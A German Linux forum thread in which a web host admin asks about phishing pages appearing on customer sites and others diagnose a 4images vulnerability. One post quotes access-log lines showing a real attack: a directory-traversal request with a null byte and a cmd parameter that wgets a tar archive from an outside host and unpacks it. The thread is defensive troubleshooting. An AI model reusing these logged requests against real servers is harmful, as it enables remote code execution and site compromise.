Pro-Linux.de

Pro-Linux

Pro-Linux Diskussions- und Hilfeforum
Aktuelle Zeit: 20. Nov 2018 23:24

Alle Zeiten sind UTC+01:00




Ein neues Thema erstellen  Auf das Thema antworten  [ 8 Beiträge ] 
Autor Nachricht
 Betreff des Beitrags: Apache Sicherheit -> Phishing Seiten
BeitragVerfasst: 01. Sep 2006 14:24 
Offline

Registriert: 01. Sep 2006 14:16
Beiträge: 4
Wohnort: Winterthur
Hallo zusammen,

Ich hab ne Frage zum Apache Server.

Jede virtuelle Domain hat einen eigenen Benutzer und eine eigene Gruppe,
dieser hat auch Schreibrechte, ab und zu taucht nun eine Phishingseite auf diesen Seiten auf, die wohl per HTTP Post raufgeladen wurden.

Die Rechte brauchts leider für die ver. CMS die von den Kunden installiert werden.
Hat da jemand ne Idee?

Gruss Pascal


Nach oben
   
 Betreff des Beitrags:
BeitragVerfasst: 01. Sep 2006 15:08 
Offline
prolinux-forum-admin

Registriert: 26. Jun 2004 21:18
Beiträge: 1444
Zitat:
die wohl per HTTP Post raufgeladen wurden.
Meinst du nicht 'PUT'?
Wenn doch 'POST', werden die übermittelten Daten unreichend validiert. Zeig mal ein paar Einträge solcher uploads aus der access.conf.

MfG, Klopskuchen

_________________
When all else fails, read the instructions .


Nach oben
   
 Betreff des Beitrags:
BeitragVerfasst: 01. Sep 2006 15:12 
Offline

Registriert: 01. Sep 2006 14:16
Beiträge: 4
Wohnort: Winterthur
So was:
Zitat:
81.24.26.57 - - [31/Aug/2006:23:52:00 +0200] "GET /4images/index.php?template=../../data/tmp_media/b.jpg%00&cmd=wget%20-o%20../ama.tar%20nusunteu.xhost.ro/am
a.tar;ls%20../ama.tar HTTP/1.1" 200 644 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
81.24.26.57 - - [31/Aug/2006:23:53:27 +0200] "GET /4images/index.php?template=../../data/tmp_media/b.jpg%00&cmd=cd%20..;tar%20xvf%20ama.tar HTTP/1.1" 200 633
"-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
81.24.26.57 - - [31/Aug/2006:23:53:37 +0200] "GET /4images/index.php?template=../../data/tmp_media/b.jpg%00&cmd=ls%20ama.tar HTTP/1.1" 200 641 "-" "Mozilla/5
.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
81.24.26.57 - - [31/Aug/2006:23:53:43 +0200] "GET /4images/index.php?template=../../data/tmp_media/b.jpg%00&cmd=tar%20xvf%20ama.tar HTTP/1.1" 200 1622 "-" "M
ozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
ich denke das liegt wohl am cms von diesem kunden?

edit:: ist wohl so ein php gallery tool...


Nach oben
   
 Betreff des Beitrags:
BeitragVerfasst: 01. Sep 2006 15:28 
Offline
prolinux-forum-admin

Registriert: 26. Jun 2004 21:18
Beiträge: 1444
Zitat:
../../[...]&cmd=wget...
- Ist das Ausführen beliebiger Kommandos vorgesehen?
- Ist das directory-traversal vorgesehen? (Hast du rumänische Kunden? :) )
- Was ist das für Software?


MfG, Klopskuchen

_________________
When all else fails, read the instructions .


Nach oben
   
 Betreff des Beitrags:
BeitragVerfasst: 01. Sep 2006 15:35 
Offline

Registriert: 01. Sep 2006 14:16
Beiträge: 4
Wohnort: Winterthur
Hallo,

Ich denke das ist ne Sicherheitslücke,

http://www.4homepages.de/forum/index.php?topic=11855.0

muss ich wohl updaten. Aber ist halt schwierig. Ich kann ja nicht alle Kundendomains überwachen... Und die können installieren was Sie wollen....

Wie handhabt ihr das so?


Nach oben
   
 Betreff des Beitrags:
BeitragVerfasst: 01. Sep 2006 16:00 
Offline
prolinux-forum-admin

Registriert: 26. Jun 2004 21:18
Beiträge: 1444
Zitat:
Und die können installieren was Sie wollen
Wenn eine Kunde kaputte Software fährt und sein Kram zerstört wird, hat er Pech gehabt. Du solltest Kunden voreinander schützen. Und deinen Server vorm Kunden. Solange jemand nur sein eigenes Verzeichnis zerschießt, naja wen juckts, daß ist sein Bier.


MfG, Klopskuchen

_________________
When all else fails, read the instructions .


Nach oben
   
 Betreff des Beitrags:
BeitragVerfasst: 03. Sep 2006 15:31 
Offline

Registriert: 01. Sep 2006 14:16
Beiträge: 4
Wohnort: Winterthur
Was kann man denn da überprüfen?

Meine Systeme sind Debian Sarge 3.1 und als Verwaltungstool setze ich VHCS ein.
Die System wurden nach VHCS HowTO's erstellt.

Dieser macht virtuelle Hosts in der Apachekonf. Mehr ist da aber glaubs nicht drin.
Kann man die einzelnen Seiten irgendwie von einander schützen?

Die Phishing-Dateien gehören dann der Gruppe www-data.
Jede Domain hat eigentlich eine Gruppe und einen Benutzer mit dem gleichem Namen,
aber der www-data hat da trotzdem Rechte (apache-user?).

Falls jemand n gutes Howto hat würd ich das gerne mal durchchecken.

Danke


Nach oben
   
 Betreff des Beitrags:
BeitragVerfasst: 09. Sep 2006 16:12 
Offline
prolinux-forum-admin

Registriert: 26. Jun 2004 21:18
Beiträge: 1444
http://www.php-faq.de/q/q-konfiguration-safe-mode.html
Im Idealfall mod-cgi und su-exec. Ist allerdings etwas langsamer in der Ausführung, weshalb gerade Massenhoster mod-php bevorzugen um mehr Kunden auf eine Kiste klatschen zu können.


MfG, Klopskuchen

_________________
When all else fails, read the instructions .


Nach oben
   
Beiträge der letzten Zeit anzeigen:  Sortiere nach  
Ein neues Thema erstellen  Auf das Thema antworten  [ 8 Beiträge ] 

Alle Zeiten sind UTC+01:00


Wer ist online?

Mitglieder in diesem Forum: 0 Mitglieder und 0 Gäste


Sie dürfen keine neuen Themen in diesem Forum erstellen.
Sie dürfen keine Antworten zu Themen in diesem Forum erstellen.
Sie dürfen Ihre Beiträge in diesem Forum nicht ändern.
Sie dürfen Ihre Beiträge in diesem Forum nicht löschen.
Sie dürfen keine Dateianhänge in diesem Forum erstellen.

Suche nach:
Gehe zu:  
Powered by phpBB® Forum Software © phpBB Limited
Deutsche Übersetzung durch phpBB.de